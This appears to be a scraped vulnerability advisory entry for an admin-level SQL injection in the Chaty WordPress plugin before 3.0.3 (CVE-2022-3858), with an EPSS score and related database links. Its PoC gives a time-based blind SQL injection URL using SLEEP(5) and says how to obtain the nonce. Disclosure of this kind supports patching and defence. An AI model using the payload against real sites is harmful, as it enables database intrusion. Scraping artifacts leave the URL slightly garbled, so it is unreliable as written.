Lucene search
Nguyen Duy Quoc KhanhWPVDB-ID:D251B6C1-602B-4D72-9D6A-BF5D5EC541ECHistoryNov 14, 2022 - 12:00 a.m.
Chaty < 3.0.3 - Admin+ SQLi
2022-11-1400:00:00
Nguyen Duy Quoc Khanh
wpscan.com
4
chaty plugin
sql injection
admin role
0.001 Low
EPSS
Percentile
37.9%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin.
PoC
https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&remove;_chaty_leads=9a03751f9d&action;=delete_message&paged;=1&search;&chaty;_leads=3)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)%3B–± To get the nonce, check the source of https://example.com/wp-admin/admin.php?page=chaty-contact-form-feed for remove_chaty_leads
Related
openvas
openvas
WordPress Chaty Plugin < 3.0.3 SQLi Vulnerability
2022-12-06 00:00:00
nvd
nvd
CVE-2022-3858
2022-12-05 17:15:10
wpexploit
wpexploit
Chaty < 3.0.3 - Admin+ SQLi
2022-11-14 00:00:00
cvelist
cvelist
CVE-2022-3858 Chaty < 3.0.3 - Admin+ SQLi
2022-12-05 16:50:40
cve
cve
CVE-2022-3858
2022-12-05 17:15:10
prion
prion
Sql injection
2022-12-05 17:15:00